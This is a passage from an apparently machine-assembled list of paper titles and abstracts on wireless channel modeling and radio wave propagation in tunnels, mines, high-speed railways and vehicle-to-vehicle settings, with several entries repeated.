conclusions that the near-field region signal in shed tunnel fade soon, and the vertical polarization radio wave propagate in the shed tunnel is greatly influenced by environment. --- paper_title: A multi-mode waveguide tunnel channel model for high-speed train wireless communication systems paper_content: The recent development of high-speed trains (HSTs) introduce new challenges to wireless communication systems for HSTs. 
For demonstrating the feasibility of these systems, accurate channel models which can mimic key characteristics of HST wireless channels are essential. In this paper, we focus on HST channel models for the tunnel scenario, which is different from other HST channel environments, such as rural area and viaducts. Considering unique characteristics of tunnel channel environments, we extend the existing multi-mode waveguide tunnel channel model to be time dependent, obtain the channel impulse responses, and then further investigate certain key tunnel channel characteristics such as temporal autocorrelation function (ACF) and power spectrum density (PSD). The impact of time on ACFs and PSDs, and the impact of frequency on the received power are revealed via numerical results. --- paper_title: Research on Doppler spread of multipath channel in subway tunnel paper_content: Radio wave propagation in subway tunnel differs strongly from other circumstances because of the multi-path characteristics and special structure. A real multi-path propagation model for radio transmission in typical rectangular subway tunnel is presented in this paper, and ray-tracing technologies and wireless statistical theory are used to analyze Doppler spread and Doppler shift. Simulation results based on Wireless Insite show that Doppler spread and Doppler shift in tunnel are depended strongly upon frequency and velocity. Higher frequency signals and higher train's velocity exhibit larger Doppler spread and Doppler shift. The simulation results in this paper provide a reference for the application of 4G and 5G technologies used in metro system. --- paper_title: A Modified Method for Predicting the Radio Propagation Characteristics in Tunnels paper_content: Paths between transmitter and receiver could be determined based on geometric optics in straight rectangular tunnels. Later on, the united theory of diffraction is used to calculate receiving power. This method could also be applied to other tunnels with different cross section. From the results of simulation and theory, this method has the same exactness as dedicated software, as well as lower complexity of computing. --- paper_title: A Study on Channel Modeling in Tunnel Scenario Based on Propagation-Graph Theory paper_content: A new approach based on conventional propagation graph channel modeling was proposed to haracterize the wireless channel in non-light of sight (NLOS) tunnel scenarios. The scattering points are regarded as several points sets, which are different from the propagation-graph theory, then the transfer probability among sets is introduced to adjust the channel impulse response (CIR) taps. The advantage of the proposed method is that wideband channel coefficients, CIR in delay, antennas' correlation coefficient, angle of arrival (AOA), angle of departure (AOD), channel capacity can be calculated analytically for these environments. The validation of the proposed method is performed by the reasonable distribution of the CIR taps, AOD and AOA. Finally some works are done to investigate the variation of tunnel channel coefficients when tunnel bending angle varies, and channel matrix degradation is adopted to explain it. --- paper_title: Graph Theoretic Models and Tools for the Analysis of Dynamic Wireless Multihop Networks paper_content: Wireless multihop networks are being increasingly used in military and civilian applications. Advanced applications of wireless multihop networks demand better understanding on their properties. 
Existing research on wireless multihop networks has largely focused on static networks, where the network topology is time-invariant; and there is comparatively a lack of understanding on the properties of dynamic networks with dynamically changing topology. In this paper, we use and extend a recently proposed graph theoretic model, i.e. evolving graphs, to capture the characteristics of such networks. We extend and develop the concepts of route matrix, connectivity matrix and probabilistic connectivity matrix as convenient tools to characterize and investigate the properties of evolving graphs and the associated dynamic networks. The properties of these matrices are established and their relevance to the properties of dynamic wireless multihop networks are introduced. --- paper_title: WINNER model for subway tunnel at 5.8 GHz paper_content: Modern subways operation relies on wireless systems based on IEEE802.11x modems deployed inside tunnels. Constraints on robustness and needs for high data rates led to the use of MIMO techniques. In order to evaluate performance of MIMO systems in dynamic configurations with moving trains, it is mandatory to develop adequate dynamic channel model. In this paper, the authors present a new WINNER based model for a subway tunnel at 5.8 GHz in a representative geometric configuration with two tracks and two crossing trains and a 4×4 MIMO system. The statistical behavior of the key parameters of the new WINNER scenario are derived from the complex impulse responses obtained with a 3D ray tracing simulator and given in this paper. Five clusters are considered. The total received power and the 4×4 MIMO channel capacity are compared with the ones derived from the 3D ray tracing simulator. --- paper_title: Physics-based ultra-wideband channel modeling for tunnel/mining environments paper_content: Understanding wireless channels in mining environments is critical for designing optimized wireless systems in these complex environments. In this paper, we propose a physics-based deterministic UWB channel model for characterizing wireless channels in mining/tunnel environments. Both the time domain Channel Impulse Response (CIR) and frequency domain channel transfer function for tunnel environments are derived in an analytical form. The derived CIR and transfer function are validated by RF measurements at different frequencies. --- paper_title: Computational Electrodynamics the Finite-Difference Time-Domain Method paper_content: Part 1 Reinventing electromagnetics: background history of space-grid time-domain techniques for Maxwell's equations scaling to very large problem sizes defense applications dual-use electromagnetics technology. Part 2 The one-dimensional scalar wave equation: propagating wave solutions finite-difference approximation of the scalar wave equation dispersion relations for the one-dimensional wave equation numerical group velocity numerical stability. Part 3 Introduction to Maxwell's equations and the Yee algorithm: Maxwell's equations in three dimensions reduction to two dimensions equivalence to the wave equation in one dimension. Part 4 Numerical stability: TM mode time eigenvalue problem space eigenvalue problem extension to the full three-dimensional Yee algorithm. Part 5 Numerical dispersion: comparison with the ideal dispersion case reduction to the ideal dispersion case for special grid conditions dispersion-optimized basic Yee algorithm dispersion-optimized Yee algorithm with fourth-order accurate spatial differences. 
Part 6 Incident wave source conditions for free space and waveguides: requirements for the plane wave source condition the hard source total-field/scattered field formulation pure scattered field formulation choice of incident plane wave formulation. Part 7 Absorbing boundary conditions for free space and waveguides: Bayliss-Turkel scattered-wave annihilating operators Engquist-Majda one-way wave equations Higdon operator Liao extrapolation Mei-Fang superabsorption Berenger perfectly-matched layer (PML) absorbing boundary conditions for waveguides. Part 8 Near-to-far field transformation: obtaining phasor quantities via discrete fourier transformation surface equivalence theorem extension to three dimensions phasor domain. Part 9 Dispersive, nonlinear, and gain materials: linear isotropic case recursive convolution method linear gyrontropic case linear isotropic case auxiliary differential equation method, Lorentz gain media. Part 10 Local subcell models of the fine geometrical features: basis of contour-path FD-TD modelling the simplest contour-path subcell models the thin wire conformal modelling of curved surfaces the thin material sheet relativistic motion of PEC boundaries. Part 11 Explicit time-domain solution of Maxwell's equations using non-orthogonal and unstructured grids, Stephen Gedney and Faiza Lansing: nonuniform, orthogonal grids globally orthogonal global curvilinear co-ordinates irregular non-orthogonal unstructured grids analysis of printed circuit devices using the planar generalized Yee algorithm. Part 12 The body of revolution FD-TD algorithm, Thomas Jurgens and Gregory Saewert: field expansion difference equations for on-axis cells numerical stability PML absorbing boundary condition. Part 13 Modelling of electromagnetic fields in high-speed electronic circuits, Piket-May and Taflove. (part contents). --- paper_title: GBSB MODEL for MIMO Channel AND its Space-time CORRELATION Analysis in Tunnel paper_content: Aiming at the special space in the tunnel, this paper assumes the geometric distribution of scatterers which is totally different from on the ground, puts forward a new GBSB model of MIMO channel and deduces the space-time correlation function of the model. The results of theoretical analysis and simulation show that the model can more accurately reflect the factors which impact the channel correlation in the tunnel. --- paper_title: Theory of the propagation of UHF radio waves in coal mine tunnels paper_content: The theoretical study of UHF radio communication in coal mines, with particular reference to the rate of loss of signal strength along a tunnel, and from one tunnel to another around a corner is the concern of this paper. Of prime interest are the nature of the propagation mechanism and the prediction of the radio frequency that propagates with the smallest loss. The theoretical results are compared with published measurements. This work was part of an investigation of new ways to reach and extend two-way communications to the key individuals who are highly mobile within the sections and haulageways of coal mines. --- paper_title: Energy efficiency of small cell backhaul networks based on Gauss–Markov mobile models paper_content: To satisfy the recent growth of mobile data usage, small cells are recommended to deploy into conventional cellular networks. However, the massive backhaul traffic is a troublesome problem for small cell networks, especial in wireless backhaul transmission links. 
In this study, backhaul traffic models are first presented considering the Gauss–Markov mobile models of mobile stations in small cell networks. Furthermore, an energy efficiency model of small cell backhaul networks with Gauss–Markov mobile models has been proposed. Numerical results indicate that the energy efficiency of small cell backhaul networks can be optimised by trade-off the number and radius of small cells in cellular networks. --- paper_title: A Hybrid Ray-Tracing/Vector Parabolic Equation Method for Propagation Modeling in Train Communication Channels paper_content: In recent years, various techniques have been applied to modeling radio-wave propagation in railway networks, each one presenting its own advantages and limitations. This paper presents a hybrid channel modeling technique, which combines two of these methods, the ray-tracing (RT) and vector parabolic equation (VPE) methods, to enable the modeling of realistic railway scenarios including stations and long guideways within a unified simulation framework. The general-purpose RT method is applied to analyze propagation in complex areas, whereas the VPE method is reserved for long and uniform tunnel as well as open-air sections. By using the advantages of VPE to compensate for the limitations of RT and vice versa, this hybrid model ensures improved accuracy and computational savings. Numerical results are validated with experimental measurements in various railway scenarios, including an actual deployment site of communication-based train control (CBTC) systems. --- paper_title: Radio Wave Propagation in Arched Cross Section Tunnels – Simulations and Measurements paper_content: For several years, wireless communication systems have been developed for train to infrastructure communication needs related to railway or mass transit applications. The systems should be able to operate in specific environments, such as tunnels. In this context, specific radio planning tools have to be developed to optimize system deployment. Realistic tunnels geometries are generally of rectangular cross section or arch-shaped. Furthermore, they are mostly curved. In order to calculate electromagnetic wave propagation in such tunnels, specific models have to be developed. Several works have dealt with retransmission of GSM or UMTS. Few theoretical or experimental works have focused on 2.4 GHz or 5.8 GHz bands. In this paper, we propose an approach to model radio wave propagation in these frequency bands in straight arch-shaped tunnels using tessellation in multi-facets. The model is based on a Ray Tracing tool using the image method. The work reported in this paper shows the propagation loss variations according to the shape of tunnels. A parametric study on the facets size to model the cross section is conducted. The influence of tunnel dimensions and signal frequency is examined. Finally, some measurement results in a straight arch-shaped tunnel are presented and analyzed in terms of slow and fast fading. --- paper_title: SBR image approach for radio wave propagation in tunnels with and without traffic paper_content: We propose a deterministic approach to model the radio propagation channels in tunnels with and without traffic. This technique applies the modified shooting and bouncing ray (SBR) method to find equivalent sources (images) in each launched ray tube and sums the receiving complex amplitude contributed by all images coherently. 
In addition, the vector effective antenna height (VEH) is introduced to consider the polarization-coupling effect resulting from the shape of the tunnels. We verify this approach by comparing the numerical results in two canonical examples where closed-form solutions exist. The good agreement indicates that our method can provide a good approximation of high-frequency radio propagation inside tunnels where reflection is dominant. We show that the propagation loss in tunnels can vary considerably according to the tunnel shapes and the traffic inside them. From the results we also find a "focusing" effect, which makes the power received in an arched tunnel higher than that in a rectangular tunnel. Besides, the deep fading that appears in a rectangular tunnel is absent in an arched tunnel. The major effect of the traffic is observed to be the fast fading due to the reflection/obstruction of vehicles. Additional considerations, such as time delay, wall roughness, and wedge diffraction of radio wave propagation in tunnels are left for future studies. --- paper_title: Ray-density normalization for ray-optical wave propagation modeling in arbitrarily shaped tunnels paper_content: This work is concerned with the calculation of natural electromagnetic (EM) wave propagation and the determination of the propagation channel characteristics in highway or railway tunnels in the ultrahigh-frequency (UHF) range and above (>300 MHz). A novel ray-tracing technique based on geometrical optics (GO) is presented. Contrary to classical ray tracing, where the one ray representing a locally plane wave front is searched, the new method requires multiple representatives of each physical EM wave at a time. The contribution of each ray to the total field at the receiver is determined by the proposed ray-density normalization (RBN). This technique has the further advantage of overcoming one of the major disadvantages of GO, the failure at caustics. In contrast to existing techniques, the new approach does not use ray tubes or adaptive reception spheres. Consequently, it does not suffer their restrictions to planar geometries. Therefore, it allows one to predict the propagation of high-frequency EM waves in confined spaces with curved boundaries, like tunnels, with an adequate precision. The approach is verified theoretically with canonical examples and by various measurements at 120 GHz in scaled tunnel models. --- paper_title: Ray optical modeling of wireless communications in high-speed railway tunnels paper_content: A new deterministic approach for wave propagation modeling in high-speed train tunnels is presented. The model is based on a new ray launching method and results in the polarimetric and complex channel impulse response as well as the Doppler diagram for radio links between on-train stations and tunnel-fixed stations. Different channel simulations under certain propagation conditions are presented. --- paper_title: Channel modeling and analysis for wireless networks in underground mines and road tunnels paper_content: Wireless networks can greatly facilitate the communication in underground mines and road/subway tunnels, where the propagation characteristics of electromagnetic (EM) waves are significantly different from those in terrestrial environments. According to the structure of underground mines and road tunnels, two types of channel models can be utilized, namely, tunnel and room/pillar channel models. 
However, there exists no theoretical model for room-and-pillar channel in underground mines to date, and current existing tunnel channel models do not provide an analytical solution for both near and far regions of the sources. In this paper, the multimode model is proposed, which provides an analytical expression for the received power and the power delay profile at any position in a tunnel.Moreover, the multimode model is extended to characterize the room-and-pillar channel in the underground mines after combining it with the shadow fading model. The theoretical models are validated by experimental measurements. Based on the proposed channel models, the effects of various factors on the signal propagation are analyzed. The factors include: the operating frequency, the size of the tunnel or underground mine room, the antenna position and polarization, and the electrical parameters. --- paper_title: Theory of the propagation of UHF radio waves in coal mine tunnels paper_content: The theoretical study of UHF radio communication in coal mines, with particular reference to the rate of loss of signal strength along a tunnel, and from one tunnel to another around a corner is the concern of this paper. Of prime interest are the nature of the propagation mechanism and the prediction of the radio frequency that propagates with the smallest loss. The theoretical results are compared with published measurements. This work was part of an investigation of new ways to reach and extend two-way communications to the key individuals who are highly mobile within the sections and haulageways of coal mines. --- paper_title: On wireless communication in tunnels paper_content: We review recent research work on wireless communication in straight and curved tunnels. Modal theory of fields in a circular tunnel excited by a linear source is given in detail. Closed form expressions for the propagation parameters of the dominant modes in circular and rectangular straight tunnels in the high frequencies are derived. We present field measurements in tunnels and interpret them in terms of the mode theory. The main characteristics of the dominant modes in a curved tunnel are studied. --- paper_title: Radio Wave Propagation Scene Partitioning for High-Speed Rails paper_content: Radio wave propagation scene partitioning is necessary for wireless channel modeling. As far as we know, there are no standards of scene partitioning for high-speed rail (HSR) scenarios, and therefore we propose the radio wave propagation scene partitioning scheme for HSR scenarios in this paper. Based on our measurements along the Wuhan-Guangzhou HSR, Zhengzhou-Xian passenger-dedicated line, Shijiazhuang-Taiyuan passenger-dedicated line, and Beijing-Tianjin intercity line in China, whose operation speeds are above 300 km/h, and based on the investigations on Beijing South Railway Station, Zhengzhou Railway Station, Wuhan Railway Station, Changsha Railway Station, Xian North Railway Station, Shijiazhuang North Railway Station, Taiyuan Railway Station, and Tianjin Railway Station, we obtain an overview of HSR propagation channels and record many valuable measurement data for HSR scenarios. On the basis of these measurements and investigations, we partitioned the HSR scene into twelve scenarios. Further work on theoretical analysis based on radio wave propagation mechanisms, such as reflection and diffraction, may lead us to develop the standard of radio wave propagation scene partitioning for HSR. 
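The multimode waveguide picture referred to above, in which the received power is a superposition of modes that each decay with their own attenuation constant and accumulate their own phase, can be illustrated with a minimal sketch. The mode amplitudes and propagation constants below are placeholders chosen only to show near-region interference versus far-region single-mode decay.

```python
import numpy as np

def multimode_power_db(z_m, mode_amplitudes, alphas_np_per_m, betas_rad_per_m):
    """Relative received power (dB) at axial distance z for a toy multimode model."""
    z = np.asarray(z_m, dtype=float)[:, None]
    c = np.asarray(mode_amplitudes, dtype=complex)[None, :]
    gamma = np.asarray(alphas_np_per_m)[None, :] + 1j * np.asarray(betas_rad_per_m)[None, :]
    field = np.sum(c * np.exp(-gamma * z), axis=1)     # coherent sum over modes
    return 10.0 * np.log10(np.abs(field) ** 2 + 1e-30)

z = np.linspace(1.0, 500.0, 50)
# Placeholder values: higher-order modes start weaker and decay faster.
print(np.round(multimode_power_db(z, [1.0, 0.4, 0.2], [0.002, 0.01, 0.03], [52.3, 52.1, 51.8])[:5], 2))
```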
Our work can also be used as a basis for the wireless channel modeling and the selection of some key techniques for HSR systems. --- paper_title: Computational Electrodynamics the Finite-Difference Time-Domain Method paper_content: Part 1 Reinventing electromagnetics: background history of space-grid time-domain techniques for Maxwell's equations scaling to very large problem sizes defense applications dual-use electromagnetics technology. Part 2 The one-dimensional scalar wave equation: propagating wave solutions finite-difference approximation of the scalar wave equation dispersion relations for the one-dimensional wave equation numerical group velocity numerical stability. Part 3 Introduction to Maxwell's equations and the Yee algorithm: Maxwell's equations in three dimensions reduction to two dimensions equivalence to the wave equation in one dimension. Part 4 Numerical stability: TM mode time eigenvalue problem space eigenvalue problem extension to the full three-dimensional Yee algorithm. Part 5 Numerical dispersion: comparison with the ideal dispersion case reduction to the ideal dispersion case for special grid conditions dispersion-optimized basic Yee algorithm dispersion-optimized Yee algorithm with fourth-order accurate spatial differences. Part 6 Incident wave source conditions for free space and waveguides: requirements for the plane wave source condition the hard source total-field/scattered field formulation pure scattered field formulation choice of incident plane wave formulation. Part 7 Absorbing boundary conditions for free space and waveguides: Bayliss-Turkel scattered-wave annihilating operators Engquist-Majda one-way wave equations Higdon operator Liao extrapolation Mei-Fang superabsorption Berenger perfectly-matched layer (PML) absorbing boundary conditions for waveguides. Part 8 Near-to-far field transformation: obtaining phasor quantities via discrete fourier transformation surface equivalence theorem extension to three dimensions phasor domain. Part 9 Dispersive, nonlinear, and gain materials: linear isotropic case recursive convolution method linear gyrontropic case linear isotropic case auxiliary differential equation method, Lorentz gain media. Part 10 Local subcell models of the fine geometrical features: basis of contour-path FD-TD modelling the simplest contour-path subcell models the thin wire conformal modelling of curved surfaces the thin material sheet relativistic motion of PEC boundaries. Part 11 Explicit time-domain solution of Maxwell's equations using non-orthogonal and unstructured grids, Stephen Gedney and Faiza Lansing: nonuniform, orthogonal grids globally orthogonal global curvilinear co-ordinates irregular non-orthogonal unstructured grids analysis of printed circuit devices using the planar generalized Yee algorithm. Part 12 The body of revolution FD-TD algorithm, Thomas Jurgens and Gregory Saewert: field expansion difference equations for on-axis cells numerical stability PML absorbing boundary condition. Part 13 Modelling of electromagnetic fields in high-speed electronic circuits, Piket-May and Taflove. (part contents). --- paper_title: Modeling radio wave propagation in tunnels with a vectorial parabolic equation paper_content: To study radio wave propagation in tunnels, we present a vectorial parabolic equation (PE) taking into account the cross-section shape, wall impedances, slowly varying curvature, and torsion of the tunnel axis. 
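Since the finite-difference time-domain reference above revolves around the Yee update scheme, here is a minimal one-dimensional, normalized-field sketch of that leapfrog update. It is a vacuum toy with a hard source and no absorbing boundary, not a tunnel simulator.

```python
import numpy as np

def fdtd_1d(steps=400, cells=200, courant=0.5):
    """Minimal 1D Yee-style FDTD loop with normalized fields (illustrative only)."""
    ez = np.zeros(cells)
    hy = np.zeros(cells)
    for n in range(steps):
        hy[:-1] += courant * (ez[1:] - ez[:-1])      # update H from the curl of E
        ez[1:] += courant * (hy[1:] - hy[:-1])       # update E from the curl of H
        ez[50] = np.exp(-((n - 60) / 15.0) ** 2)     # Gaussian hard source
    return ez

print(np.round(fdtd_1d()[:10], 4))
```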
For rectangular cross section, two polarizations are decoupled and two families of adiabatic modes can be found explicitly, giving a generalization of the known results for a uniform tunnel. In the general case, a boundary value problem arises to be solved by using finite-difference/finite-element (FD/FE) techniques. Numerical examples demonstrate the computational efficiency of the proposed method. --- paper_title: Analysis of MIMO capacity in waveguide environments using practical antenna structures for selective mode excitation paper_content: Different realistic antenna configurations are studied and their impact on MIMO capacity is investigated in waveguide-like environments, such as hallways, tunnels or streets. Simulations are conducted for a 2/spl times/2 MIMO system using the the finite element method, which is particularly well suited for this kind of problem. First, each antenna is optimized independently from the other by optimizing its shape and location in a manner that insures optimal input impedance and excitation of a single mode. Subsequently, the two antennas are placed together and a final optimization is carried out to reduce their mutual coupling and improve the impedance matching. The results obtained for a 2/spl times/2 MIMO system clearly show the significance of practical antenna considerations on MIMO capacity in a waveguide environment. --- paper_title: A multi-mode waveguide tunnel channel model for high-speed train wireless communication systems paper_content: The recent development of high-speed trains (HSTs) introduce new challenges to wireless communication systems for HSTs. For demonstrating the feasibility of these systems, accurate channel models which can mimic key characteristics of HST wireless channels are essential. In this paper, we focus on HST channel models for the tunnel scenario, which is different from other HST channel environments, such as rural area and viaducts. Considering unique characteristics of tunnel channel environments, we extend the existing multi-mode waveguide tunnel channel model to be time dependent, obtain the channel impulse responses, and then further investigate certain key tunnel channel characteristics such as temporal autocorrelation function (ACF) and power spectrum density (PSD). The impact of time on ACFs and PSDs, and the impact of frequency on the received power are revealed via numerical results. --- paper_title: Channel modeling and analysis for wireless networks in underground mines and road tunnels paper_content: Wireless networks can greatly facilitate the communication in underground mines and road/subway tunnels, where the propagation characteristics of electromagnetic (EM) waves are significantly different from those in terrestrial environments. According to the structure of underground mines and road tunnels, two types of channel models can be utilized, namely, tunnel and room/pillar channel models. However, there exists no theoretical model for room-and-pillar channel in underground mines to date, and current existing tunnel channel models do not provide an analytical solution for both near and far regions of the sources. In this paper, the multimode model is proposed, which provides an analytical expression for the received power and the power delay profile at any position in a tunnel.Moreover, the multimode model is extended to characterize the room-and-pillar channel in the underground mines after combining it with the shadow fading model. 
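As a toy counterpart to the parabolic-equation marching discussed above, the following sketch advances a scalar narrow-angle PE with the standard split-step FFT method. Tunnel walls, impedance boundaries and the vectorial treatment of the cited papers are deliberately left out; every parameter is illustrative.

```python
import numpy as np

def pe_split_step(u0, dx, dz, steps, k0, n_index):
    """March a scalar narrow-angle parabolic equation with the split-step FFT method.

    u0: complex field on a transverse grid; n_index: refractive-index profile on the
    same grid. Absorbing layers and boundary conditions are omitted on purpose.
    """
    u = np.asarray(u0, dtype=complex).copy()
    kx = 2.0 * np.pi * np.fft.fftfreq(u.size, d=dx)        # transverse wavenumbers
    diffraction = np.exp(-1j * kx**2 * dz / (2.0 * k0))    # free-space half step
    refraction = np.exp(1j * k0 * (n_index - 1.0) * dz)    # medium half step
    for _ in range(steps):
        u = np.fft.ifft(diffraction * np.fft.fft(u))
        u *= refraction
    return u

x = np.linspace(-10, 10, 256)
u0 = np.exp(-x**2)                                         # Gaussian aperture field
out = pe_split_step(u0, x[1] - x[0], dz=1.0, steps=100, k0=2 * np.pi, n_index=np.ones_like(x))
print(np.round(np.abs(out[:5]), 4))
```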
The theoretical models are validated by experimental measurements. Based on the proposed channel models, the effects of various factors on the signal propagation are analyzed. The factors include: the operating frequency, the size of the tunnel or underground mine room, the antenna position and polarization, and the electrical parameters. --- paper_title: A Hybrid Ray-Tracing/Vector Parabolic Equation Method for Propagation Modeling in Train Communication Channels paper_content: In recent years, various techniques have been applied to modeling radio-wave propagation in railway networks, each one presenting its own advantages and limitations. This paper presents a hybrid channel modeling technique, which combines two of these methods, the ray-tracing (RT) and vector parabolic equation (VPE) methods, to enable the modeling of realistic railway scenarios including stations and long guideways within a unified simulation framework. The general-purpose RT method is applied to analyze propagation in complex areas, whereas the VPE method is reserved for long and uniform tunnel as well as open-air sections. By using the advantages of VPE to compensate for the limitations of RT and vice versa, this hybrid model ensures improved accuracy and computational savings. Numerical results are validated with experimental measurements in various railway scenarios, including an actual deployment site of communication-based train control (CBTC) systems. --- paper_title: A Novel Wideband MIMO Car-to-Car Channel Model Based on a Geometrical Semi-Circular Tunnel Scattering Model paper_content: In this paper, we present a wideband multiple-input multiple-output (MIMO) car-to-car (C2C) channel model based on a geometrical semi-circular tunnel (SCT) scattering model. From the geometrical SCT scattering model, a reference channel model is derived under the assumption of single-bounce scattering in line-of-sight (LOS) and non-LOS (NLOS) propagation environments. In the proposed reference channel model, it is assumed that an infinite number of scatterers are randomly distributed on the tunnel wall. Starting from the geometrical scattering model, the time-variant transfer function (TVTF) is derived, and its correlation properties in time, frequency, and space are studied. Expressions are presented for the space–time–frequency cross-correlation function (STF-CCF), the two-dimensional (2D) space CCF, the 2D time–frequency CCF (TF-CCF), the temporal autocorrelation function (ACF), and the frequency correlation function (FCF). Owing to the semi-circular geometry, we reduced the originally threefold integrals to double integrals in the computations of the correlation functions, which simplifies the numerical analysis considerably. From the TVTF characterizing the reference model, an efficient sum-of-cisoid (SOC) channel simulator is derived. Numerical results show that both the temporal ACF and the FCF of the SOC channel simulator match very well with those of the reference model. A validation of the proposed model has been done by fitting the delay spread of the reference model to that of the measured channel, which demonstrates an excellent agreement. The proposed channel simulator allows us to evaluate the performance of C2C communication systems in tunnel environments. 
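The sum-of-cisoids simulator mentioned in the car-to-car tunnel abstract above can be sketched in a few lines: the fading process is a finite sum of complex exponentials with per-path gains, Doppler frequencies and phases. The parameter choices below are arbitrary rather than fitted to any reference model.

```python
import numpy as np

rng = np.random.default_rng(0)

def soc_process(t, n_cisoids=20, f_max=91.0):
    """Sum-of-cisoids fading process with random Doppler frequencies and phases.

    f_max (Hz) and the uniform angle/phase choices are placeholders; a real
    simulator would fit gains and Dopplers to a reference channel model.
    """
    gains = np.full(n_cisoids, 1.0 / np.sqrt(n_cisoids))
    dopplers = f_max * np.cos(rng.uniform(0, 2 * np.pi, n_cisoids))
    phases = rng.uniform(0, 2 * np.pi, n_cisoids)
    return np.sum(gains[:, None] * np.exp(1j * (2 * np.pi * dopplers[:, None] * t + phases[:, None])), axis=0)

t = np.arange(0, 0.2, 1e-4)
h = soc_process(t)
lag = 10                                    # 1 ms lag at the chosen sampling rate
acf = np.mean(h[lag:] * np.conj(h[:-lag]))  # crude temporal autocorrelation estimate
print(abs(acf))
```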
--- paper_title: 3D Wideband Non-Stationary Geometry-Based Stochastic Models for Non-Isotropic MIMO Vehicle-to-Vehicle Channels paper_content: Actual vehicle-to-vehicle (V2V) channel measurements have shown that the wide-sense stationary (WSS) modeling assumption is valid only for very short time intervals. This fact motivates us to develop non-WSS V2V channel models. In this paper, we propose a novel three-dimensional (3D) theoretical non-WSS regular-shaped geometry-based stochastic model (RS-GBSM) and the corresponding sum-of-sinusoids (SoS) simulation model for non-isotropic scattering wideband multiple-input multiple-output (MIMO) V2V fading channels. The movements of the transmitter (Tx), scatterers, and receiver (Rx) result in the time-varying angles of departure (AoDs) and angles of arrival (AoAs) that make our models non-stationary. The proposed RS-GBSMs, combining line-of-sight (LoS) components, a two-sphere model, and multiple confocal elliptic-cylinder models, have the ability to study the impacts of vehicular traffic density (VTD) and non-stationarity on channel statistics, and jointly consider the azimuth and elevation angles by using the von Mises Fisher (VMF) distribution. The proposed RS-GBSMs are sufficiently generic and adaptable to model various V2V scenarios. Based on the proposed 3D non-WSS RS-GBSMs, important local channel statistical properties are derived and thoroughly investigated. The impacts of VTD and non-stationarity on these channel statistical properties are investigated by comparing them with those of the corresponding WSS model. The proposed non-WSS RS-GBSMs are validated by measurements in terms of the channel stationary time. Finally, numerical and simulation results demonstrate that the 3D non-WSS model is more practical to characterize real V2V channels. --- paper_title: A non-stationary geometry-based stochastic model for MIMO high-speed train channels paper_content: In this paper, a non-stationary wideband geometry-based stochastic model (GBSM) is proposed for multiple-input multiple-output (MIMO) high-speed train (HST) channels. The proposed model employs multiple confocal ellipses model, where the received signal is a superposition of the line-of-sight (LoS) and single-bounced rays. Because of the time-varying feature of angles of arrival (AoAs), angles of departure (AoDs), and LoS angle, the proposed GBSM has the ability to investigate the non-stationarity of HST environment caused by the high speed movement of the receiver. From the proposed model, the local spatial cross-correlation function (CCF) and the local temporal autocorrelation (ACF) are derived for different taps. Numerical results and analysis show that the proposed channel model is capable of characterizing the time-variant HST wireless channel. --- paper_title: Novel 3D Geometry-Based Stochastic Models for Non-Isotropic MIMO Vehicle-to-Vehicle Channels paper_content: This paper proposes a novel three-dimensional (3D) theoretical regular-shaped geometry-based stochastic model (RS-GBSM) and the corresponding sum-of-sinusoids (SoS) simulation model for non-isotropic multiple-input multiple-output (MIMO) vehicle-to-vehicle (V2V) Ricean fading channels. The proposed RS-GBSM, combining line-of-sight (LoS) components, a two-sphere model, and an elliptic-cylinder model, has the ability to study the impact of the vehicular traffic density (VTD) on channel statistics, and jointly considers the azimuth and elevation angles by using the von Mises Fisher distribution. 
Moreover, a novel parameter computation method is proposed for jointly calculating the azimuth and elevation angles in the SoS channel simulator. Based on the proposed 3D theoretical RS-GBSM and its SoS simulation model, statistical properties are derived and thoroughly investigated. The impact of the elevation angle in the 3D model on key statistical properties is investigated by comparing with those of the corresponding two-dimensional (2D) model. It is demonstrated that the 3D model is more accurate to characterize real V2V channels, in particular for pico cell scenarios. Finally, close agreement is achieved between the theoretical model, SoS simulation model, and simulation results, demonstrating the utility of the proposed models. --- paper_title: Road traffic density estimation in vehicular networks paper_content: Road traffic density estimation provides important information for road planning, intelligent road routing, road traffic control, vehicular network traffic scheduling, routing and dissemination. The ever increasing number of vehicles equipped with wireless communication capabilities provide new means to estimate the road traffic density more accurately and in real time than traditionally used techniques. In this paper, we consider the problem of road traffic density estimation where each vehicle estimates its local road traffic density using some simple measurements only, i.e. the number of neighboring vehicles. A maximum likelihood estimator of the traffic density is obtained based on a rigorous analysis of the joint distribution of the number of vehicles in each hop. Analysis is also performed on the accuracy of the estimation and the amount of neighborhood information required for an accurate road traffic density estimation. Simulations are performed which validate the accuracy and the robustness of the proposed density estimation algorithm. --- paper_title: GBSB MODEL for MIMO Channel AND its Space-time CORRELATION Analysis in Tunnel paper_content: Aiming at the special space in the tunnel, this paper assumes the geometric distribution of scatterers which is totally different from on the ground, puts forward a new GBSB model of MIMO channel and deduces the space-time correlation function of the model. The results of theoretical analysis and simulation show that the model can more accurately reflect the factors which impact the channel correlation in the tunnel. --- paper_title: A generic non-stationary MIMO channel model for different high-speed train scenarios paper_content: This paper proposes a generic non-stationary wideband geometry-based stochastic model (GBSM) for multiple-input multiple-output (MIMO) high-speed train (HST) channels. The proposed generic model can be applied on the three most common HST scenarios, i.e., open space, viaduct, and cutting scenarios. A good agreement between the statistical properties of the proposed generic model and those of relevant measurement data from the aforementioned scenarios demonstrates the utility of the proposed channel model. --- paper_title: Finite-State Markov Modeling for Wireless Channels in Tunnel Communication-Based Train Control Systems paper_content: Communication-based train control (CBTC) is being rapidly adopted in urban rail transit systems, as it can significantly enhance railway network efficiency, safety, and capacity. Since CBTC systems are mostly deployed in underground tunnels and trains move at high speeds, building a train–ground wireless communication system for CBTC is a challenging task. 
Modeling the tunnel channels is very important in designing the wireless networks and evaluating the performance of CBTC systems. Most existing works on channel modeling do not consider the unique characteristics of CBTC systems, such as high mobility speed, deterministic moving direction, and accurate train-location information. In this paper, we develop a finite-state Markov channel (FSMC) model for tunnel channels in CBTC systems. The proposed FSMC model is based on real field CBTC channel measurements obtained from a business-operating subway line. Unlike most existing channel models, which are not related to specific locations, the proposed FSMC channel model takes train locations into account to have a more accurate channel model. The distance between the transmitter and the receiver is divided into intervals and an FSMC model is applied in each interval. The accuracy of the proposed FSMC model is illustrated by the simulation results generated from the model and the real field measurement results. --- paper_title: A survey on vehicle-to-vehicle propagation channels paper_content: Traffic telematics applications are currently under intense research and development for making transportation safer, more efficient, and more environmentally friendly. Reliable traffic telematics applications and services require vehicle-to-vehicle wireless communications that can provide robust connectivity, typically at data rates between 1 and 10 Mb/s. The development of such VTV communications systems and standards require, in turn, accurate models for the VTV propagation channel. A key characteristic of VTV channels is their temporal variability and inherent non-stationarity, which has major impact on data packet transmission reliability and latency. This article provides an overview of existing 